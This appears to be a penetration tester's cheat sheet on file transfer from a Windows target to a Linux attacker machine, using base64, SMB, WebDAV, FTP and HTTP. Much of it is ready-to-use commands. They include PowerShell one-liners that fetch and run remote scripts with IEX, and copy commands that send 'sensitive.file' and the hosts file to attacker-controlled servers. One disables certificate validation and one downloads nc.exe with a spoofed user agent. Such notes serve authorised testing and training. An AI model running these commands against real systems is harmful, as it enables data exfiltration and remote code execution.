TODO: add more from here
Base64#
fish, zsh, bash oneliner string comparison (for hash comparison)
[ '0733351879b2fa9bd05c7ca3061529c0' == '0733351879b2fa9bd05c7ca3061529c0' ] && echo true || echo falseThe space after
[is very important. Yes,[is a binary in/usr/bin/[
One liner for uppercase all letter
echo '0733351879b2fa9bd05c7ca3061529c0' | tr '[:lower:]' '[:upper:]'Download#
Convert file on linux attacker to base64 text
base64 -w 0 ./file
# Get MD5 hash to compare integrity
md5sum ./fileConvert base64 text to file on Windows target
[System.IO.File]::WriteAllBytes(".\output.file", [System.Convert]::FromBase64String("aGVsbG8="))
# Get MD5 hash to compare integrity
Get-FileHash .\output.file -Algorithm md5Upload#
Convert file on Windows target to base64 text
[Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\fullpath\input.file"))
certutil -encode .\input.file b64.txt
# Get MD5 hash to compare integrity
Get-FileHash .\input.file -Algorithm md5
type b64.txt
# copy the text
del b64.txtConvert base64 text to file on Linux attacker
echo 'aGVsbG8=' | base64 -d > ./file
# Get MD5 hash to compare integrity
md5sum ./fileSMB#
Open an smb server on linux attacker
sudo impacket-smbserver share -smb2support /tmp/smbshareMount#
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password testnet use n: \\<attacker-ip>\share /user:test testDownload#
copy \\<attacker-ip>\share\<file>Upload#
copy .\sensitive.file \\<attacker-ip>\share\WebDav#
Installation on Linux attacker
sudo apt install python3-wsgidav python3-cherootOpen a webdav listener, port 80
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymousDownload#
copy \\<attacker-ip>\DavWWWRoot\<file>
copy \\<attacker-ip>\sharefolder\<file>Upload#
copy .\sensitive.file \\<attacker-ip>\DavWWWRoot\
copy .\sensitive.file \\<attacker-ip>\sharefolder\Commands used the same as SMB. On windows at least. WebDav is a http module that makes http server behave like a file share server.
FTP#
Download#
Open an ftp server on linux attacker
sudo python3 -m pyftpdlib --port 21Download file from ftp server on Windows target
(New-Object Net.WebClient).DownloadString('ftp://<attacker-ip>/<file>')Or, if can’t execute above and don’t have interactive shell
echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo GET file.txt >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txtUpload#
Open a writable ftp server on linux attacker
sudo python3 -m pyftpdlib --port 21 --writeUpload file to ftp server on Windows target
(New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')Or, if can’t execute above and don’t have interactive shell
echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txtHTTP server#
Download#
Open an http server on linux attacker
python -m http.server -p 8080Download file from http server on Windows target
(New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
# Not blocking execution
(New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')Or, if invalid ssl cert
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}Or, filelessly, download ps script and executes
IEX (New-Object Net.WebClient).DownloadString('<URL>')
Invoke-WebRequest -UseBasicParsing https://<ip>/file.ps1 | IEXOr, change user agent. First list out what user agent we have
[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | flThen use one of them
$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"Upload#
Install and run http upload server on Linux attacker
pipx install uploadserver
python3 -m uploadserverInstall PSUpload on Windows target
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')Upload file to http server
Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hostsOr, using native windows tools. A little cranky#
On Linux attacker, open netcat listener.
nc -lvnp 8080Note that when Windows target connects, it will send a http request, so you have to remove the http header and get only the base64 string
Convert file to base64 string on windows
$b64 = [System.convert]::ToBase64String((Get-Content -Path '.\file' -Encoding Byte))Upload
Invoke-WebRequest -Uri http://192.168.49.128:8080/ -Method POST -Body $b64